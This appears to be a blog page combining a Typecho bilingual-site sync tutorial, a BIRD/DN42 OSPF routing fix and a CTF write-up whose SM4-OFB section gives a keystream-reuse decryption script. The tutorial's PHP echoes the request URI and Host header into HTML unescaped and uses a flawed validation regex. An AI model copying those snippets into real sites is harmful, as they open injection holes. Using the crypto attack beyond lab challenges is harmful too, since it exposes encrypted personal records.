        $database = new Typecho_Widget_Helper_Form_Element_Text('database', NULL, 'typecho_en', _t('English DB Name'));
        $port = new Typecho_Widget_Helper_Form_Element_Text('port', NULL, '3306', _t('English DB Port'));
        $charset = new Typecho_Widget_Helper_Form_Element_Text('charset', NULL, 'utf8mb4', _t('Charset'));
        $prefix = new Typecho_Widget_Helper_Form_Element_Text('prefix', NULL, 'typecho_', _t('Table Prefix'));
        $form->addInput($host);
        $form->addInput($user);
        $form->addInput($password);
        $form->addInput($database);
        $form->addInput($port);
        $form->addInput($charset);
        $form->addInput($prefix);
    }

    public static function personalConfig(Typecho_Widget_Helper_Form $form) {}

    public static function push($contents, $widget)
    {
        $options = Helper::options();
        $config = $options->plugin('SyncToEnglish');

        // Get article info from the Chinese database
        $cnDb = Typecho_Db::get();
        if (is_array($contents) && isset($contents['cid'])) {
            $cid = $contents['cid'];
            $title = $contents['title'];
        } elseif (is_object($contents) && isset($contents->cid)) {
            $cid = $contents->cid;
            $title = $contents->title;
        } else {
            $db = Typecho_Db::get();
            $row = $db->fetchRow($db->select()->from('table.contents')->order('cid', Typecho_Db::SORT_DESC)->limit(1));
            $cid = $row['cid'];
            $title = $row['title'];
            error_log("[SyncToEnglish DEBUG] CID not found in param, fallback to latest cid={$cid}\n", 3, __DIR__ . '/debug.log');
        }

        $article = $cnDb->fetchRow($cnDb->select()->from('table.contents')->where('cid = ?', $cid));
        if (!$article) return;

        $enDb = new Typecho_Db('Mysql', $config->prefix);
        $enDb->addServer([
            'host' => $config->host,
            'user' => $config->user,
            'password' => $config->password,
            'charset' => $config->charset,
            'port' => (int)$config->port,
            'database' => $config->database
        ], Typecho_Db::READ | Typecho_Db::WRITE);

        try {
            $exists = $enDb->fetchRow($enDb->select()->from('table.contents')->where('cid = ?', $article['cid']));
            if ($exists) {
                $enDb->query($enDb->update('table.contents')
                    ->rows([
                        // 'title' => $article['title'],
                        'slug' => $article['slug'],
                        'modified' => $article['modified']
                    ])
                    ->where('cid = ?', $article['cid'])
                );
            } else {
                $enDb->query($enDb->insert('table.contents')->rows([
                    'cid' => $article['cid'],
                    'title' => $article['title'],
                    'slug' => $article['slug'],
                    'created' => $article['created'],
                    'modified' => $article['modified'],
                    'type' => $article['type'],
                    'status' => $article['status'],
                    'authorId' => $article['authorId'],
                    'views' => 0,
                    'text' => $article['text'],
                    'allowComment' => $article['allowComment'],
                    'allowFeed' => $article['allowFeed'],
                    'allowPing' => $article['allowPing']
                ]));
            }
        } catch (Exception $e) {
            error_log('[SyncToEnglish] Sync failed: ' . $e->getMessage());
        }
    }
}
```

Then go to the admin backend, enable the plugin, and fill in the English database information.
After completion, publishing an article on the Chinese site should automatically publish an article with the same cid on the English site. Configure the Language Switcher Since we have synchronized the article cid, switching languages now only requires modifying the URL by adding or removing the /en/ prefix. We can create a switcher using PHP and place it in the theme's header: <!-- Language Selector --> <div class="joe_dropdown" trigger="hover" placement="60px"> <div class="joe_dropdown__link"> <a href="#" rel="nofollow">Language</a> <svg class="joe_dropdown__link-icon" viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="14" height="14"> <path d="M561.873 725.165c-11.262 11.262-26.545 21.72-41.025 18.502-14.479 2.413-28.154-8.849-39.415-18.502L133.129 375.252c-17.697-17.696-17.697-46.655 0-64.352s46.655-17.696 64.351 0l324.173 333.021 324.977-333.02c17.696-17.697 46.655-17.697 64.351 0s17.697 46.655 0 64.351L561.873 725.165z" fill="var(--main)" /> </svg> </div> <nav class="joe_dropdown__menu"> <?php // Get the current full URL $current_url = $_SERVER['REQUEST_URI']; $host = $_SERVER['HTTP_HOST']; // Check if there is an English prefix "/en/" if (strpos($current_url, '/en/') === 0) { $current_url = substr_replace($current_url, '', 0, 3); } $new_url_cn = 'https://' . $host . $current_url; $new_url_en = 'https://' . $host . '/en' . $current_url; // Generate the two hyperlinks echo '<a href="' . $new_url_cn . '">简体中文</a>'; echo '<a href="' . $new_url_en . '">English</a>'; ?> </nav> </div> This needs to be added to both the Chinese and English instances. After this, the language selector should be available globally. For the Joe theme I use, separate language selectors needed to be written for mobile and PC views. Modify the SiteMap Plugin To help search engines index the English pages faster, I decided to modify the SiteMap plugin to include the English site's pages. 
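The switcher's URL logic is just prefix arithmetic; a quick Python equivalent (illustrative only — the live version is the PHP above) makes the two cases explicit:

```python
def toggle_language(path: str) -> tuple[str, str]:
    """Given the current request path, return (chinese_path, english_path)."""
    # Strip a leading "/en" so the computation is prefix-independent
    if path.startswith("/en/"):
        path = path[3:]          # "/en/archives/1/" -> "/archives/1/"
    return path, "/en" + path

print(toggle_language("/archives/1/"))      # ('/archives/1/', '/en/archives/1/')
print(toggle_language("/en/archives/1/"))   # ('/archives/1/', '/en/archives/1/')
```

Either way a visitor lands, both links resolve to the same pair of pages, which is what keeps the selector identical across the two instances.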
There are two types of sitemaps: sitemapindex (for indexing sub-sitemaps) and urlset (for containing page URLs). I use the joyqi/typecho-plugin-sitemap plugin. Based on this, I changed the default /sitemap.xml to a sitemapindex, created a new route /sitemap_cn.xml to hold the Chinese site's sitemap, left the English site's plugin unchanged (its sitemap remains at /en/sitemap.xml), and had the main index sitemap reference both /sitemap_cn.xml and /en/sitemap.xml. Modify the SiteMap's Plugin.php: /** * Activate plugin method, if activated failed, throw exception will disable this plugin. */ public static function activate() { Helper::addRoute( - 'sitemap', + 'sitemap_index', '/sitemap.xml', Generator::class, - 'generate', + 'generate_index', 'index' ); + Helper::addRoute( + 'sitemap_cn', + '/sitemap_cn.xml', + Generator::class, + 'generate_cn', + 'index' + ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { - Helper::removeRoute('sitemap'); + Helper::removeRoute('sitemap_index'); + Helper::removeRoute('sitemap_cn'); } {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Typecho\Plugin\PluginInterface; use Typecho\Widget\Helper\Form; use Utils\Helper; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Plugin to automatically generate a sitemap for Typecho. * The sitemap URL is: http(s)://yourdomain.com/sitemap.xml * * @package Sitemap Plugin * @author joyqi * @version 1.0.0 * @since 1.2.1 * @link https://github.com/joyqi/typecho-plugin-sitemap */ class Plugin implements PluginInterface { /** * Activate plugin method, if activated failed, throw exception will disable this plugin. 
*/ public static function activate() { Helper::addRoute( 'sitemap_index', '/sitemap.xml', Generator::class, 'generate_index', 'index' ); Helper::addRoute( 'sitemap_cn', '/sitemap_cn.xml', Generator::class, 'generate_cn', 'index' ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { Helper::removeRoute('sitemap_index'); Helper::removeRoute('sitemap_cn'); } /** * Plugin config panel render method. * * @param Form $form */ public static function config(Form $form) { $sitemapBlock = new Form\Element\Checkbox( 'sitemapBlock', [ 'posts' => _t('Generate post links'), 'pages' => _t('Generate page links'), 'categories' => _t('Generate category links'), 'tags' => _t('Generate tag links'), ], ['posts', 'pages', 'categories', 'tags'], _t('Sitemap Display') ); $updateFreq = new Form\Element\Select( 'updateFreq', [ 'daily' => _t('Daily'), 'weekly' => _t('Weekly'), 'monthly' => _t('Monthly or less often'), ], 'daily', _t('Update Frequency') ); // $externalSitemap = new Typecho_Widget_Helper_Form_Element_Text('externalSitemap', NULL, '', _t('Additional Sitemap')); $form->addInput($sitemapBlock->multiMode()); $form->addInput($updateFreq); // $form->addInput($externalSitemap); } /** * Plugin personal config panel render method. * * @param Form $form */ public static function personalConfig(Form $form) { // TODO: Implement personalConfig() method. 
} } {/collapse-item} {/collapse} Modify the SiteMap's Generator.php: class Generator extends Contents { + public function generate_index(){ + $sitemap = '<?xml version="1.0" encoding="UTF-8"?> +<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> + <sitemap> + <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> + </sitemap> + <sitemap> + <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> + </sitemap> +</sitemapindex>'; + $this->response->throwContent($sitemap, 'text/xml'); + } + /** * @return void */ - public function generate() + public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; ... {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Widget\Base\Contents; use Widget\Contents\Page\Rows; use Widget\Contents\Post\Recent; use Widget\Metas\Category\Rows as CategoryRows; use Widget\Metas\Tag\Cloud; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Sitemap Generator */ class Generator extends Contents { public function generate_index(){ $sitemap = '<?xml version="1.0" encoding="UTF-8"?> <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> </sitemap> <sitemap> <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> </sitemap> </sitemapindex>'; $this->response->throwContent($sitemap, 'text/xml'); } /** * @return void */ public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; $sitemap .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"' . ' xmlns:news="http://www.google.com/schemas/sitemap-news/0.9"' . ' xmlns:xhtml="http://www.w3.org/1999/xhtml"' . ' xmlns:image="http://www.google.com/schemas/sitemap-image/1.1"' . ' xmlns:video="http://www.google.com/schemas/sitemap-video/1.1">' . 
PHP_EOL; // add homepage $sitemap .= <<<EOF <url> <loc>{$this->options->siteUrl}</loc> <changefreq>daily</changefreq> <priority>1.0</priority> </url> EOF; // add posts if (in_array('posts', $this->options->plugin('Sitemap')->sitemapBlock)) { $postsCount = $this->size($this->select() ->where('table.contents.status = ?', 'publish') ->where('table.contents.created < ?', $this->options->time) ->where('table.contents.type = ?', 'post')); $posts = Recent::alloc(['pageSize' => $postsCount]); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 'monthly' : 'weekly'; while ($posts->next()) { $sitemap .= <<<EOF <url> <loc>{$posts->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$posts->date->format('c')}</lastmod> <priority>0.8</priority> </url> EOF; } } // add pages if (in_array('pages', $this->options->plugin('Sitemap')->sitemapBlock)) { $pages = Rows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 'yearly' : 'monthly'; while ($pages->next()) { $sitemap .= <<<EOF <url> <loc>{$pages->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$pages->date->format('c')}</lastmod> <priority>0.5</priority> </url> EOF; } } // add categories if (in_array('categories', $this->options->plugin('Sitemap')->sitemapBlock)) { $categories = CategoryRows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($categories->next()) { $sitemap .= <<<EOF <url> <loc>{$categories->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.6</priority> </url> EOF; } } // add tags if (in_array('tags', $this->options->plugin('Sitemap')->sitemapBlock)) { $tags = Cloud::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($tags->next()) { $sitemap .= <<<EOF <url> <loc>{$tags->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.4</priority> </url> EOF; } } $sitemap .= '</urlset>'; $this->response->throwContent($sitemap, 'text/xml'); } } {/collapse-item} {/collapse} Please replace the blog URL in 
the code with your own. (I was too busy recently to create a separate configuration page, so I hardcoded the sitemap URLs into the plugin for now.)

Disable and then re-enable the plugin. Visiting https://<host>/sitemap.xml should now show the sitemap index:

<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
    <sitemap>
        <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc>
    </sitemap>
    <sitemap>
        <loc>https://www.iyoroy.cn/en/sitemap.xml</loc>
    </sitemap>
</sitemapindex>

You should also be able to see that search engines like Bing Webmaster Tools have detected the English site's sitemap.

Add hreflang

This step informs search engines that the current page has multi-language versions, allowing them to serve the appropriate page based on a user's language preference or location. We need to insert link tags of the following form within the <head></head> section:

<link rel="alternate" hreflang="en-us" href="https://example.com/us">
<link rel="alternate" hreflang="fr" href="https://example.com/fr">
<link rel="alternate" hreflang="x-default" href="https://example.com/default">

Here, hreflang="x-default" marks the fallback page served when no other language version matches the visitor. The value of hreflang is an ISO 639-1 language code plus an optional ISO 3166-1 Alpha-2 region code (e.g., distinguishing en, en-US, and en-GB).

Add the following content to the relevant section of your theme's <head></head>:

<?php
// Get the current full URL
$current_url = $_SERVER['REQUEST_URI'];
$host = $_SERVER['HTTP_HOST'];
// Check if there is an English prefix "/en/"
if (strpos($current_url, '/en/') === 0) {
    $current_url = substr_replace($current_url, '', 0, 3);
}
$new_url_cn = 'https://' . $host . $current_url;
$new_url_en = 'https://' . $host . '/en' .
$current_url; // Generate the link tags echo '<link rel="alternate" hreflang="zh-cn" href="'.$new_url_cn.'" />'; echo '<link rel="alternate" hreflang="en-us" href="'.$new_url_en.'" />'; echo '<link rel="alternate" hreflang="x-default" href="'.$new_url_cn.'" />'; ?> This needs to be added to both the Chinese and English sites. After this, you should find the corresponding hreflang configuration in the <head> section of your website pages. Sync Like Counts and View Counts This step is highly theme-dependent and might not apply to all themes. I use the Joe theme, which handles reading and writing like counts and view counts to the database directly. I modified the English instance's theme code to read and write these values directly from/to the Chinese instance's database. Modify the function that retrieves view counts in <webroot>/en/usr/themes/Joe/core/function.php: /* Query Post Views */ function _getViews($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $item->cid))['views']; if ($type) echo number_format($result); else return number_format($result); } Modify the function that retrieves like counts in <webroot>/en/usr/themes/Joe/core/function.php: /* Query Post Like Count */ function _getAgree($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = 
$db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $item->cid))['agree']; if ($type) echo number_format($result); else return number_format($result); } Modify the code displaying view counts on the homepage in <webroot>/en/usr/themes/Joe/core/route.php: $result[] = array( "mode" => $item->fields->mode ? $item->fields->mode : 'default', "image" => _getThumbnails($item), "time" => date('Y-m-d', $item->created), "created" => date('d/m/Y', $item->created), "title" => $item->title, "abstract" => _getAbstract($item, false), "category" => $item->categories, - "views" => number_format($item->views), + // "views" => number_format($item->views), + "views" => _getViews($item, false), "commentsNum" => number_format($item->commentsNum), - "agree" => number_format($item->agree), + // "agree" => number_format($item->agree), + "agree" => _getAgree($item, false), "permalink" => $item->permalink, "lazyload" => _getLazyload(false), "type" => "normal" ); The code displaying view counts on the article page itself already uses _getViews, so it doesn't need modification. Modify the code that increments view counts: /* Increase View Count - Tested √ */ function _handleViews($self) { $self->response->setStatus(200); $cid = $self->request->cid; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! 
Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { Modify the code for liking and unliking: /* Like and Unlike - Tested √ */ function _handleAgree($self) { $self->response->setStatus(200); $cid = $self->request->cid; $type = $self->request->type; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } /* SQL injection check */ if (!preg_match('/^[agree|disagree]+$/', $type)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { After making these changes and saving, visiting the English site should show view counts and like counts synchronized with the Chinese site. Sync Comments I initially thought about creating a plugin that hooks into the comment submission function to simultaneously insert comment data into the other instance's database. However, I found that my Joe theme already hooks into this, and adding another hook might cause conflicts. Therefore, I directly edited the Joe theme's code. 
Edit <webroot>/index/usr/themes/Joe/core/factory.php: <?php require_once("phpmailer.php"); require_once("smtp.php"); /* Enhanced Comment Interception */ Typecho_Plugin::factory('Widget_Feedback')->comment = array('Intercept', 'message'); class Intercept { public static function message($comment) { ... Typecho_Cookie::delete('__typecho_remember_text'); + + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho_en', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho_en' + ], Typecho_Db::READ | Typecho_Db::WRITE); + + $row = [ + 'coid' => $comment['coid'], // Must include the newly generated comment ID + 'cid' => $comment['cid'], + 'created' => $comment['created'], + 'author' => $comment['author'], + 'authorId' => $comment['authorId'], + 'ownerId' => $comment['ownerId'], + 'mail' => $comment['mail'], + 'url' => $comment['url'], + 'ip' => $comment['ip'], + 'agent' => $comment['agent'], + 'text' => $comment['text'], + 'type' => $comment['type'], + 'status' => $comment['status'], + 'parent' => $comment['parent'] + ]; + + // Insert data into the target database's `comments` table + $db->query($db->insert('typecho_comments')->rows($row)); return $comment; } } ... Perform the same operation on the English instance, inserting comments into the Chinese database. One issue with this scheme is that if you need to delete spam comments, you must delete them separately in both instances. I'll fix that later (maybe). Reference: typecho/languages - GitHub
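Until that fix lands, deleting a spam comment consistently means issuing the same delete against both databases. The idea can be sketched with a tiny helper (SQLite stand-ins for the two MySQL instances; table and helper names are illustrative, not part of Typecho or the Joe theme):

```python
import sqlite3

def delete_comment_everywhere(coid: int, dbs: list) -> int:
    """Delete a comment by coid from every instance; return total rows removed."""
    removed = 0
    for db in dbs:
        cur = db.execute("DELETE FROM comments WHERE coid = ?", (coid,))
        db.commit()
        removed += cur.rowcount
    return removed

cn, en = sqlite3.connect(":memory:"), sqlite3.connect(":memory:")
for db in (cn, en):
    db.execute("CREATE TABLE comments (coid INTEGER PRIMARY KEY, text TEXT)")
    db.execute("INSERT INTO comments VALUES (7, 'spam')")

print(delete_comment_everywhere(7, [cn, en]))  # 2
```

Because the coid is copied verbatim when the comment is mirrored, a single identifier is enough to address the same comment on both sites.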
19/11/2025
141 Views
0 Comments
1 Stars
DN42&OneManISP - Troubleshooting OSPF Source Address in a Coexistence Environment
Backstory

As mentioned in the previous post of this series, the VRF solution was so isolating that the DNS service I deployed on the HKG node (172.20.234.225) became unreachable from the DN42 network. Research indicated this could be worked around with veth pairs or NAT forwarding, but given the scarcity of documentation, I ultimately abandoned the VRF approach.

Structure Analysis

This time, I planned to place both the DN42 and clearnet BGP routes into the system's main routing table, then separate them on export using filters. For clarity, I stored the configuration for the DN42 part and the clearnet part (hereinafter "inet") separately, and included both from the main configuration file. Also, since there should ideally be only one kernel protocol per routing table, I merged the DN42 and inet kernel sections into a single instance.

After multiple rounds of optimization and revision, my final directory structure is as follows:

/etc/bird/
├─envvars
├─bird.conf: Main Bird config file; defines basic info (ASN, IP, etc.) and includes the sub-configs below
├─kernel.conf: Kernel config; imports routes into the system routing table
├─dn42
| ├─defs.conf: DN42 function definitions, e.g. is_self_dn42_net()
| ├─ibgp.conf: DN42 iBGP template
| ├─rpki.conf: DN42 RPKI route validation
| ├─ospf.conf: DN42 OSPF internal network
| ├─static.conf: DN42 static routes
| ├─ebgp.conf: DN42 peer template
| ├─ibgp
| | └<ibgp configs>: DN42 iBGP configs for each node
| ├─ospf
| | └backbone.conf: OSPF area
| ├─peers
| | └<peer configs>: DN42 peer configs for each node
├─inet
| ├─peer.conf: Clearnet peer
| ├─ixp.conf: Clearnet IXP connection
| ├─defs.conf: Clearnet function definitions, e.g. is_self_inet_v6()
| ├─upstream.conf: Clearnet upstream
| └static.conf: Clearnet static routes

I put the function definitions in their own files because the filters in kernel.conf need to reference them, so they must be included early.
After filling in the respective configurations and setting up the include relationships, I ran birdc configure and BIRD started successfully. So, case closed... right?

Problems occurred

After running for a while, I suddenly found that I couldn't ping the HKG node from my internal devices, nor could I ping my other internal nodes from the HKG node. Strangely, external ASes could still ping my other nodes or other external ASes through the HKG node, and my internal nodes could still reach non-directly-connected nodes via HKG (e.g., 226(NKG) -> 225(HKG) -> 229(LAX)).

Running ip route get <other internal node address> revealed:

root@iYoRoyNetworkHKG:/etc/bird# ip route get 172.20.234.226
172.20.234.226 via 172.20.234.226 dev dn42_nkg src 23.149.120.51 uid 0
    cache

See the problem? The src address should have been the HKG node's own DN42 address (configured on the OSPF stub interface), but it shows the node's clearnet address instead.

Reading the route learned by Bird with birdc s r for 172.20.234.226:

root@iYoRoyNetworkHKGBGP:/etc/bird/dn42/ospf# birdc s r for 172.20.234.226
BIRD 2.17.1 ready.
Table master4:
172.20.234.226/32    unicast [dn42_ospf_iyoroynet_v4 00:30:29.307] * I (150/50) [172.20.234.226]
	via 172.20.234.226 on dn42_nkg onlink

This looks normal at first glance. In theory, even though the DN42 source IP differs from the usual one, the kernel protocol's export filter (per the common DN42 configuration) rewrites krt_prefsrc to tell the kernel the correct source address, so this issue shouldn't occur:

protocol kernel kernel_v4 {
    ipv4 {
        import none;
        export filter {
            if source = RTS_STATIC then reject;
+           if is_valid_dn42_network() then krt_prefsrc = DN42_OWNIP;
            accept;
        };
    };
}

protocol kernel kernel_v6 {
    ipv6 {
        import none;
        export filter {
            if source = RTS_STATIC then reject;
+           if is_valid_dn42_network_v6() then krt_prefsrc = DN42_OWNIPv6;
            accept;
        };
    };
}

Regarding krt_prefsrc: it stands for Kernel Route Preferred Source.
This attribute doesn't manipulate the route itself; it attaches a piece of metadata that instructs the Linux kernel to use the specified IP address as the source address for packets sent via this route. I was stuck on this for a long time.

The Solution

Finally, almost by accident, I added the krt_prefsrc rewrite to the OSPF import filter as well:

protocol ospf v3 dn42_ospf_iyoroynet_v4 {
    router id DN42_OWNIP;
    ipv4 {
-       import where is_self_dn42_net() && source != RTS_BGP;
+       import filter {
+           if is_self_dn42_net() && source != RTS_BGP then {
+               krt_prefsrc = DN42_OWNIP;
+               accept;
+           }
+           reject;
+       };
        export where is_self_dn42_net() && source != RTS_BGP;
    };
    include "ospf/*";
};

protocol ospf v3 dn42_ospf_iyoroynet_v6 {
    router id DN42_OWNIP;
    ipv6 {
-       import where is_self_dn42_net_v6() && source != RTS_BGP;
+       import filter {
+           if is_self_dn42_net_v6() && source != RTS_BGP then {
+               krt_prefsrc = DN42_OWNIPv6;
+               accept;
+           }
+           reject;
+       };
        export where is_self_dn42_net_v6() && source != RTS_BGP;
    };
    include "ospf/*";
};

After reloading, the src address became correct and the nodes could ping each other again.

Configuration files for reference: KaguraiYoRoy/Bird2-Configuration
29/10/2025
92 Views
0 Comments
1 Stars
2025 Yangcheng Cup CTF Preliminary WriteUp
GD1 The file description indicates this is a game developed with Godot Engine. Using GDRE tools to open it, we can locate the game logic: extends Node @export var mob_scene: PackedScene var score var a = "000001101000000001100101000010000011000001100111000010000100000001110000000100100011000100100000000001100111000100010111000001100110000100000101000001110000000010001001000100010100000001000101000100010111000001010011000010010111000010000000000001010000000001000101000010000001000100000110000100010101000100010010000001110101000100000111000001000101000100010100000100000100000001001000000001110110000001111001000001000101000100011001000001010111000010000111000010010000000001010110000001101000000100000001000010000011000100100101" func _ready(): pass func _process(delta: float) -> void : pass func game_over(): $ScoreTimer.stop() $MobTimer.stop() $HUD.show_game_over() func new_game(): score = 0 $Player.start($StartPosition.position) $StartTimer.start() $HUD.update_score(score) $HUD.show_message("Get Ready") get_tree().call_group("mobs", "queue_free") func _on_mob_timer_timeout(): var mob = mob_scene.instantiate() var mob_spawn_location = $MobPath / MobSpawnLocation mob_spawn_location.progress_ratio = randf() var direction = mob_spawn_location.rotation + PI / 2 mob.position = mob_spawn_location.position direction += randf_range( - PI / 4, PI / 4) mob.rotation = direction var velocity = Vector2(randf_range(150.0, 250.0), 0.0) mob.linear_velocity = velocity.rotated(direction) add_child(mob) func _on_score_timer_timeout(): score += 1 $HUD.update_score(score) if score == 7906: var result = "" for i in range(0, a.length(), 12): var bin_chunk = a.substr(i, 12) var hundreds = bin_chunk.substr(0, 4).bin_to_int() var tens = bin_chunk.substr(4, 4).bin_to_int() var units = bin_chunk.substr(8, 4).bin_to_int() var ascii_value = hundreds * 100 + tens * 10 + units result += String.chr(ascii_value) $HUD.show_message(result) func _on_start_timer_timeout(): $MobTimer.start() 
$ScoreTimer.start() We discover that when the score reaches 7906, a decryption algorithm is triggered to decrypt data from array a and print it. We wrote a decryption program following this logic: #include <iostream> #include <string> #include <bitset> using namespace std; int bin_to_int(const string &bin) { return stoi(bin, nullptr, 2); } string decodeBinaryString(const string &a) { string result; for (size_t i = 0; i + 12 <= a.length(); i += 12) { string bin_chunk = a.substr(i, 12); int hundreds = bin_to_int(bin_chunk.substr(0, 4)); int tens = bin_to_int(bin_chunk.substr(4, 4)); int units = bin_to_int(bin_chunk.substr(8, 4)); int ascii_value = hundreds * 100 + tens * 10 + units; result.push_back(static_cast<char>(ascii_value)); } return result; } int main() { string a = "000001101000000001100101000010000011000001100111000010000100000001110000000100100011000100100000000001100111000100010111000001100110000100000101000001110000000010001001000100010100000001000101000100010111000001010011000010010111000010000000000001010000000001000101000010000001000100000110000100010101000100010010000001110101000100000111000001000101000100010100000100000100000001001000000001110110000001111001000001000101000100011001000001010111000010000111000010010000000001010110000001101000000100000001000010000011000100100101"; cout << decodeBinaryString(a) << endl; return 0; } Execution yields the Flag: DASCTF{xCuBiFYr-u5aP2-QjspKk-rh0LO-w9WZ8DeS} 成功男人背后的女人 (The Woman Behind the Successful Man) Opening the attachment reveals an image. Based on the hint, we suspected hidden images or other content. Initial attempts with binwalk and foremost yielded nothing. Research indicated the use of Adobe Fireworks' proprietary protocol. 
Opening the image with appropriate tools revealed the hidden content. The symbols at the bottom, combined, form binary:

01000100010000010101001101000011
01010100010001100111101101110111
00110000011011010100010101001110
01011111011000100110010101101000
00110001011011100100010001011111
01001101010001010110111001111101

Decoding in 8-bit groups:

#include <iostream>
#include <string>
using namespace std;

int main() {
    string str = "010001000100000101010011010000110101010001000110011110110111011100110000011011010100010101001110010111110110001001100101011010000011000101101110010001000101111101001101010001010110111001111101";
    for (size_t i = 0; i < str.length(); i += 8) {
        cout << (char)stoi(str.substr(i, 8), nullptr, 2);
    }
    return 0;
}

Execution yields: DASCTF{w0mEN_beh1nD_MEn}

SM4-OFB

We had AI analyze the encryption process and write a decryption script:

# Run this locally (or in this environment) to recover the plaintext (under the SM4-OFB assumption).
# The script:
# 1) Uses record1's known plaintext and ciphertext to compute the keystream for each block
#    (assuming PKCS#7 padding to 16 bytes and that each field restarts OFB from the same IV)
# 2) Uses the derived keystream to decrypt record2's corresponding fields, tries to strip the
#    padding, and prints the plaintext (UTF-8 decoded)
#
# Note: this script needs NO key. It only exploits the keystream reuse caused by a known
# plaintext plus a reused IV/mode (the classic OFB/CTR weakness).
# Install pycryptodome if you want to verify against the actual cipher; this script itself
# only performs XOR operations and never invokes the cipher.

from binascii import unhexlify, hexlify
from Crypto.Util.Padding import pad, unpad

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# record1: known plaintext and ciphertext (user-provided)
record1 = {
    "name_plain": "蒋宏玲".encode('utf-8'),
    "name_cipher_hex": "cef18c919f99f9ea19905245fae9574e",
    "phone_plain": "17145949399".encode('utf-8'),
    "phone_cipher_hex": "17543640042f2a5d98ae6c47f8eb554c",
    "id_plain": "220000197309078766".encode('utf-8'),
    "id_cipher_hex": "1451374401262f5d9ca4657bcdd9687eac8baace87de269e6659fdbc1f3ea41c",
    "iv_hex": "6162636465666768696a6b6c6d6e6f70"
}

# record2: ciphertext only (user-provided)
record2 = {
    "name_cipher_hex": "c0ffb69293b0146ea19d5f48f7e45a43",
    "phone_cipher_hex": "175533440427265293a16447f8eb554c",
    "id_cipher_hex": "1751374401262f5d9ca36576ccde617fad8baace87de269e6659fdbc1f3ea41c",
    "iv_hex": "6162636465666768696a6b6c6d6e6f70"
}

BS = 16  # block size

# Helper: split a field into 16-byte blocks
def split_blocks(b):
    return [b[i:i+BS] for i in range(0, len(b), BS)]

# 1) Derive the keystream for each record1 field
#    (assumes PKCS#7 padding before encryption, then block-wise XOR)
ks_blocks = {"name": [], "phone": [], "id": []}

# name
C_name = unhexlify(record1["name_cipher_hex"])
P_name_padded = pad(record1["name_plain"], BS)
for c, p in zip(split_blocks(C_name), split_blocks(P_name_padded)):
    ks_blocks["name"].append(xor_bytes(c, p))

# phone
C_phone = unhexlify(record1["phone_cipher_hex"])
P_phone_padded = pad(record1["phone_plain"], BS)
for c, p in zip(split_blocks(C_phone), split_blocks(P_phone_padded)):
    ks_blocks["phone"].append(xor_bytes(c, p))

# id (may span two blocks)
